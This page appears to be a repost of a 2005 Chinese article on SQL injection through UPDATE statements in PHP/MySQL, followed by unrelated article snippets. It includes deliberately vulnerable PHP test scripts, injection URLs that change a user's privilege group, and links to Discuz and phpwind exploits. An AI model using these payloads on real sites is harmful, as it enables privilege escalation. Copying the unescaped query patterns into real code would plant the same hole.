mysql update實質,UPDATE注射(mysql+php)的兩個模式

UPDATE注射(mysql+php)的兩個模式

2021-01-23 7:48:35424

UPDATE注射(mysql+php)的兩個模式

文/安全天使·SuperHei2005.8.11

一.測試環境:

OS:Windowsxpsp2

php:php4.3.10(

mysql4.1.9

apache1.3.33

二.測試數據庫結構:

-----start---

--數據庫:`test`

--

----------------------------------------------------------

--

--表的結構`userinfo`

--

CREATETABLE`userinfo`(

`groudid`varchar(12)NOTNULLdefault'1',

`user`varchar(12)NOTNULLdefault'heige',

`pass`varchar(122)NOTNULLdefault'123456'

)ENGINE=MyISAMDEFAULTCHARSET=latin1;

--

--導出表中的數據`userinfo`

--

INSERTINTO`userinfo`VALUES('2','heige','123456');

------end-------

三.測試模式:

1,變量沒有帶''或""[MOD1]

//test1.phpMod1

$servername="localhost";

$dbusername="root";

$dbpassword="";

$dbname="test";

mysql_connect($servername,$dbusername,$dbpassword)ordie("數據庫連接失敗");

$sql="updateuserinfosetpass=$pwhereuser='heige'";//

$result=mysql_db_query($dbname,$sql);

$userinfo=mysql_fetch_array($result);

echo"

SQLQuery:$sql

";

?>

腳本里只是修改user='heige'的pass,如果groudid表示用戶的權限等級,我們的目的就是通過構造$p來達

到修改groupid的目的:

那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查詢:

mysql>select*fromuserinfo;

+---------+-------+--------+

|groudid|user|pass|

+---------+-------+--------+

|1|heige|123456|

+---------+-------+--------+

1rowinset(0.01sec)

用戶heige的groudid又2改為1了:)

所以我們可以得到沒有''或""update的注射是可以成功的,這個就是我們的模式1。

2,變量帶''或""[MOD2]

//test2.php

$servername="localhost";

$dbusername="root";

$dbpassword="";

$dbname="test";

mysql_connect($servername,$dbusername,$dbpassword)ordie("數據庫連接失敗");

$sql="updateuserinfosetpass='$p'whereuser='heige'";//

$result=mysql_db_query($dbname,$sql);

$userinfo=mysql_fetch_array($result);

echo"

SQLQuery:$sql

";

?>

為了關閉'我們構造$p應該為123456',groudid='2提交:

http://127.0.0.1/test2.php?p=123456',groudid='1在gpc=on的情況下'變成了\'

提交的語句變成:SQLQuery:updateuserinfosetpass='123456\',groudid=\'1'whereuser='heige'

mysql查詢:

mysql>select*fromuserinfo;

+---------+-------+--------------------+

|groudid|user|pass|

+---------+-------+--------------------+

|2|heige|123456',groudid='1|

+---------+-------+--------------------+

1rowinset(0.00sec)

groudid并沒有被修改。那么在變量被''或""時就完全沒有被注射呢?不是下面我們看模式2:

//test3.phpMod2

$servername="localhost";

$dbusername="root";

$dbpassword="";

$dbname="test";

mysql_connect($servername,$dbusername,$dbpassword)ordie("數據庫連接失敗");

$sql="updateuserinfosetpass='$p'whereuser='heige'";//

$result=mysql_db_query($dbname,$sql);

mysql_fetch_array($result);//$p的數據寫入數據庫

$sql="selectpassfromuserinfowhereuser='heige'";

$result=mysql_db_query($dbname,$sql);

$userinfo=mysql_fetch_array($result);

echo$userinfo[0];//把pass查詢輸出給$userinfo[0]

$sql="updateuserinfosetpass='$userinfo[0]'whereuser='heige'";

$result=mysql_db_query($dbname,$sql);

mysql_fetch_array($result);//把$userinfo[0]再次update

?>

我們測試下,提交:http://127.0.0.1/test3.php?p=123456',groudid='1

回mysql查詢下:

mysql>select*fromuserinfo;

+---------+-------+--------+

|groudid|user|pass|

+---------+-------+--------+

|1|heige|123456|

+---------+-------+--------+

1rowinset(0.00sec)

HaHa~~成功注射修改groudid為1。這個就是我們的模式2了,簡單的描敘如下:

update-->select-->update

四.實際模式

模式1:Discuz2.0/2.2register.php注射

漏洞分析:http://4ngel.net/article/41.htm

Discuz2.0/2.2register.phpRemoteExploit:http://4ngel.net/project/discuz_reg.htm

模式2:phpwind2.0.2和3.31e權限提升漏洞

漏洞分析:

update(profile.php注射變量為$proiconupdate語句里為,icon='$userdb[icon]')

v

select(jop.php)

v

updtate(jop.php)

Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

五.鳴謝

特別感謝saiy等朋友的討論和幫助。Thanks!!!

點擊這里復制本文地址

以上內容由聚米學院網友整理呈現,如對侵犯您的權益,請聯系郵箱:fzsbm@qq.com

留言評論

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/452713.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/452713.shtml
英文地址,請注明出處:http://en.pswp.cn/news/452713.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

數據庫系統的特點

數據結構化數據的共享性高,冗余度低且易擴充數據獨立性高數據由數據庫管理系統統一管理和控制

SNF軟件開發機器人-子系統-導出-導入功能-多人合作時這個功能經常用到

導出 導出可以將資源表和子系統導出并形成一個json文件。 1.效果展示: 2.使用說明: 點擊導出按鈕后會彈出一個導出頁面。頁面的左側可以選擇功能,右側可以選擇資源表,選擇功能的同時右側中功能所需的資源表也會被選擇。當功能之間…

基于物理的渲染-用真實的環境光照亮物體

目前,在游戲引擎中用于照亮物體的光源非常豐富。其中,比較常用的有:平行方向光、點光源、聚光燈以及體積光等,但它們都是對真實光源的近似,并不能很好地模擬真實世界中的復雜光照情況。為了增加光照效果的真實感&#…

php中取出數組中指定的值,PHP除開數組中指定的值

PHP去除數組中指定的值//一維數組簡單的做法 unset($arr[array_search($value,$arr)])$arr array("a","b","c","d");function isHave($var){if($var!"b")return true;}$arr_filter array_values(array_filter($arr,"…

實體以及實體型和實體集

實體(Entity) 客觀存在并可相互區別的事物稱為實體。 可以是具體的人、事、物或抽象的概念。 屬性(Attribute) 實體所具有的某一特性稱為屬性。 一個實體可以由若干個屬性來刻畫。 實體型(Entity Type&#xf…

mysql中locat函數,MySQL中的LOCATE和POSITION函數使用方法 | 很文博客

不常用:MySQL中的LOCATE和POSITION函數LOCATE(substr,str)POSITION(substr IN str)返回子串 substr 在字符串 str 中第一次出現的位置。如果子串 substr 在 str 中不存在,返回值為 0:mysql> SELECT LOCATE(bar, ‘foobarbar);-> 4mysql…

什么是數據的完整性約束

為了防止不符合規范的數據進入數據庫,在用戶對數據進行插入、修改、刪除等操作時,DBMS自動按照一定的約束條件對數據進行監測,使不符合規范的數據不能進入數據庫,以確保數據庫中存儲的數據正確、有效、相容。

Python--協程(gevent模塊)

一:前言 協程又稱為微線程,纖程。英文名Coroutine:協程是一種用戶態的輕量級線程 協程擁有自己的寄存器上下文和棧。協程調度切換時,將寄存器上下文和棧保存到其他地方,在切回來的時候,恢復之前保存的寄存器上下文和…

ffmpeg 0.6.3 代碼, 經過我努力,能夠在vs 2005 下單步調試代碼

1. ffmpeg-0.6.3_modify.7z 是修改后的ffmepg的代碼; 2.ffmpeg-0.6.3_srouce.tar.bz2 是ffmpeg原始代碼; 3.SDL-devel-1.2.15-VC.zip 是圖像顯示使用使用的sdl代碼; 4.w_cc_p_10.1.020.exe 是vc 2005 需要使用的編譯器&#xff1b…

克隆CentOS6虛擬機eth0被修改為eth1如何修改eth0

2019獨角獸企業重金招聘Python工程師標準>>> 直接修改 /etc/sysconfig/network-script/ifcfg-eth0 刪掉UUID HWADDR 配置靜態地址 然后: rm -rf  /etc/udev/rules.d/70-persistent-net.rules然后reboot 轉載于:https://my.oschina.net/hengbao666/blog/…

[Hnoi2013]消毒

Description 最近在生物實驗室工作的小T遇到了大麻煩。 由于實驗室最近升級的緣故,他的分格實驗皿是一個長方體,其尺寸為abc,a、b、c 均為正整數。為了實驗的方便,它被劃分為abc個單位立方體區域,每個單位立方體尺寸 為111。用(i,…

php按照文件名字排序,php readdir 排序問題,如何按照日期進行排序

目前是這么寫的:function posts_get($directory,$ext){if (is_dir($directory)) {$handle opendir($directory);while ($file readdir($handle)){$subdir $directory . / .$file;if ($file ! . && $file !.. && is_dir($subdir)){posts_get($sub…

關系模型的名詞

關系(Relation)一個關系對應通常說的一張表元組(Tuple)表中的一行即為一個元組屬性(Attribute)表中的一列即為一個屬性,給每一個屬性起一個名稱即屬性名主碼(Key)也稱碼鍵…

物理卷、卷組、邏輯卷

參考文章: 相關文獻 謝謝作者分享!

fibonacci數列的題目——劍指Offer

https://www.nowcoder.net/practice/c6c7742f5ba7442aada113136ddea0c3?tpId13&tqId11160&tPage1&rp1&ru/ta/coding-interviews&qru/ta/coding-interviews/question-ranking 大家都知道斐波那契數列,現在要求輸入一個整數n,請你輸出…

如何高效的編寫與同步博客 (.NET Core 小工具實現)

系列目錄 [如何高效的編寫與同步博客(一)- 編寫 ]如何高效的編寫與同步博客(二)- 快速發布到多個渠道一.前言 寫博客,可以帶給我們很多好處,比如可以讓我們結識更多志同道合的人;在寫博客過程中…

java appendable,org.eclipse.jetty.util.Utf8Appendable$NotUtf8Exception: Not valid UTF8

上傳文件奇怪的錯誤2016-10-14 11:00:52,254 nuoshang.bluejay.common.shiro.cache.RedisCache.put(RedisCache.java:54) DEBUG - SET nameshiro-activeSessionCache key70qv5bejsihmgot7hroqg6q0lv2016-10-14 11:00:52,254 nuoshang.bluejay.common.shiro.cache.LCache.fire(L…

Oracle高可用概述(HA與RAC的關系解惑)

1.你如何理解高可用的概念? 所謂的高可用HA就是當你的系統中的某個節點異常損壞了,系統還是可用狀態,還可以對外提供服務,不會因為你的節點丟失而整體癱瘓。 2.列出你知道的Oracle高可用產品,并作一些功能和應用場景上…